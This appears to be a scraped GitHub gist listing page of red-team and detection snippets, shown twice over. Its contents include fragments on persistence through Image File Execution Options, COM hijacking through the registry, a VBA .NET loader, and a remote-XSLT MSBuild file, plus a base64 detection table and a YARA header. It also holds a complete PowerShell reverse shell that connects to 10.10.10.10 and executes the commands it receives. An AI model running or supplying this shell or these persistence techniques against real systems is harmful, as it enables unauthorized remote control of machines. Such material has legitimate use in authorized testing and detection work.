ashr ashr

## ImageFileExecutionOptions.ps1
<#
    ImageFileExecutionOptions v1.0
    License: GPLv3
    Author: @netbiosX
#>
# Image File Execution Options Injection Persistence Technique
# https://pentestlab.blog/2020/01/13/persistence-image-file-execution-options-injection/

function Persist-Debugger

## Base64_CheatSheet.md

      
              1 file
            
          
              0 forks
            
          
              0 comments
            
          
              1 star
            
          
                ashr
                / Base64_CheatSheet.md
            
            
              Created
              October 24, 2019 21:31
                — forked from Neo23x0/Base64_CheatSheet.md
            
              
                Spot Malicious Base64 Encoded Code
              
          
    Learning Aid - Top Base64 Encodings Table

MITRE ATT4CK - T1132 - Data Encoding


Base64 Code
Decoded (. = 0x00)
Description
MITRE ID


JAB
$.
Variable declaration (UTF-16)
T1086


TVq
MZ
MZ header
T1001


UEs
PK
ZIP, Office documents
T1001


SUVY
IEX
PowerShell Invoke Expression
T1086


## forward.sh
#!/bin/bash

# Add a firewall NAT rule to expose a port open in a docker container, on a host.
#
# This is only really useful if the container is already running, and you don't
# want to/can't shut it down, but need a new incoming port open.
#
# Requires `jq` for parsing docker container information.
#
# 2019 @leonjza

## mscorlib_load_assembly.vba
' Need to add project references to C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscoree.tlb and mscorlib.tlb

Private Declare PtrSafe Function DispCallFunc Lib "oleaut32.dll" (ByVal pv As LongPtr, ByVal ov As LongPtr, ByVal cc As Integer, ByVal vr As Integer, ByVal ca As Long, ByRef pr As Integer, ByRef pg As LongPtr, ByRef par As Variant) As Long
Private Declare PtrSafe Sub RtlMoveMemory Lib "kernel32" (Dst As Any, Src As Any, ByVal BLen As LongPtr)
Private Declare PtrSafe Function VarPtrArray Lib "VBE7" Alias "VarPtr" (ByRef Var() As Any) As LongPtr

#If Win64 Then
Const LS As LongPtr = 8&
#Else
Const LS As LongPtr = 4&

## fbmon.c
#include <stdio.h>
#include <stdint.h>
#include <string.h>

/*
  $ gcc fbmon.c
  $ ./a.out
  *** stack smashing detected ***: <unknown> terminated
  Aborted (core dumped)

## powershell_reverse_shell.ps1
# Nikhil SamratAshok Mittal: http://www.labofapenetrationtester.com/2015/05/week-of-powershell-shells-day-1.html

$client = New-Object System.Net.Sockets.TCPClient("10.10.10.10",80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

## xslt.proj
<Project xmlns="http://schemas.microsoft.com/developer/msbuild/2003" ToolsVersion="4.0">
   <Target Name="Example">
      <ItemGroup>
        <XmlFiles Include="https://gist.githubusercontent.com/caseysmithrc/d6ef2fdffa6c054c6996b0f2fb7dd45d/raw/6ce40c15487d67df6771ff205de5ea8a8c6f29c0/customers.xml" />
      </ItemGroup>
      <PropertyGroup>
        <XslFile>https://gist.githubusercontent.com/caseysmithrc/d6ef2fdffa6c054c6996b0f2fb7dd45d/raw/48abcd2a9575e1e5db25596cbaa02f6066bbe9e2/script.xsl</XslFile>
      </PropertyGroup>
      <XslTransformation
         OutputPaths="output.%(XmlFiles.FileName).html"

## PoC.reg
Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Classes\Scripting.Dictionary]
@=""

[HKEY_CURRENT_USER\Software\Classes\Scripting.Dictionary\CLSID]
@="{00000001-0000-0000-0000-0000FEEDACDC}"


[HKEY_CURRENT_USER\Software\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}]

## iddqd.yar
/*
      _____        __  __  ___        __
     / ___/__  ___/ / /  |/  /__  ___/ /__
    / (_ / _ \/ _  / / /|_/ / _ \/ _  / -_)
    \___/\___/\_,_/_/_/__/_/\___/\_,_/\__/
     \ \/ / _ | / _ \/ _ |   / _ \__ __/ /__
      \  / __ |/ , _/ __ |  / , _/ // / / -_)
      /_/_/ |_/_/|_/_/ |_| /_/|_|\_,_/_/\__/

      Florian Roth - v0.1 May 2019

## gethelp.cs
using System;
using System.Net;
using System.Diagnostics;
using System.Reflection;
using System.Configuration.Install;
using System.Runtime.InteropServices;

/*
Author: Casey Smith, Twitter: @subTee
License: BSD 3-Clause
	<#
	ImageFileExecutionOptions v1.0
	License: GPLv3
	Author: @netbiosX
	#>
	# Image File Execution Options Injection Persistence Technique
	# https://pentestlab.blog/2020/01/13/persistence-image-file-execution-options-injection/

	function Persist-Debugger
Base64 Code	Decoded (. = 0x00)	Description	MITRE ID
JAB	$.	Variable declaration (UTF-16)	T1086
TVq	MZ	MZ header	T1001
UEs	PK	ZIP, Office documents	T1001
SUVY	IEX	PowerShell Invoke Expression	T1086
	#!/bin/bash

	# Add a firewall NAT rule to expose a port open in a docker container, on a host.
	#
	# This is only really useful if the container is already running, and you don't
	# want to/can't shut it down, but need a new incoming port open.
	#
	# Requires `jq` for parsing docker container information.
	#
	# 2019 @leonjza
	' Need to add project references to C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscoree.tlb and mscorlib.tlb

	Private Declare PtrSafe Function DispCallFunc Lib "oleaut32.dll" (ByVal pv As LongPtr, ByVal ov As LongPtr, ByVal cc As Integer, ByVal vr As Integer, ByVal ca As Long, ByRef pr As Integer, ByRef pg As LongPtr, ByRef par As Variant) As Long
	Private Declare PtrSafe Sub RtlMoveMemory Lib "kernel32" (Dst As Any, Src As Any, ByVal BLen As LongPtr)
	Private Declare PtrSafe Function VarPtrArray Lib "VBE7" Alias "VarPtr" (ByRef Var() As Any) As LongPtr

	#If Win64 Then
	Const LS As LongPtr = 8&
	#Else
	Const LS As LongPtr = 4&
	#include <stdio.h>
	#include <stdint.h>
	#include <string.h>

	/*
	$ gcc fbmon.c
	$ ./a.out
	* stack smashing detected *: <unknown> terminated
	Aborted (core dumped)
	# Nikhil SamratAshok Mittal: http://www.labofapenetrationtester.com/2015/05/week-of-powershell-shells-day-1.html

	$client = New-Object System.Net.Sockets.TCPClient("10.10.10.10",80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535\|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 \| Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
	<Project xmlns="http://schemas.microsoft.com/developer/msbuild/2003" ToolsVersion="4.0">
	<Target Name="Example">
	<ItemGroup>
	<XmlFiles Include="https://gist.githubusercontent.com/caseysmithrc/d6ef2fdffa6c054c6996b0f2fb7dd45d/raw/6ce40c15487d67df6771ff205de5ea8a8c6f29c0/customers.xml" />
	</ItemGroup>
	<PropertyGroup>
	<XslFile>https://gist.githubusercontent.com/caseysmithrc/d6ef2fdffa6c054c6996b0f2fb7dd45d/raw/48abcd2a9575e1e5db25596cbaa02f6066bbe9e2/script.xsl</XslFile>
	</PropertyGroup>
	<XslTransformation
	OutputPaths="output.%(XmlFiles.FileName).html"
	Windows Registry Editor Version 5.00

	[HKEY_CURRENT_USER\Software\Classes\Scripting.Dictionary]
	@=""

	[HKEY_CURRENT_USER\Software\Classes\Scripting.Dictionary\CLSID]
	@="{00000001-0000-0000-0000-0000FEEDACDC}"


	[HKEY_CURRENT_USER\Software\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}]
	/*
	_____ __ __ ___ __
	/ ___/__ ___/ / / \|/ /__ ___/ /__
	/ (_ / _ \/ _ / / /\|_/ / _ \/ _ / -_)
	\___/\___/\_,_/_/_/__/_/\___/\_,_/\__/
	\ \/ / _ \| / _ \/ _ \| / _ \__ __/ /__
	\ / __ \|/ , _/ __ \| / , _/ // / / -_)
	/_/_/ \|_/_/\|_/_/ \|_\| /_/\|_\|\_,_/_/\__/

	Florian Roth - v0.1 May 2019
	using System;
	using System.Net;
	using System.Diagnostics;
	using System.Reflection;
	using System.Configuration.Install;
	using System.Runtime.InteropServices;

	/*
	Author: Casey Smith, Twitter: @subTee
	License: BSD 3-Clause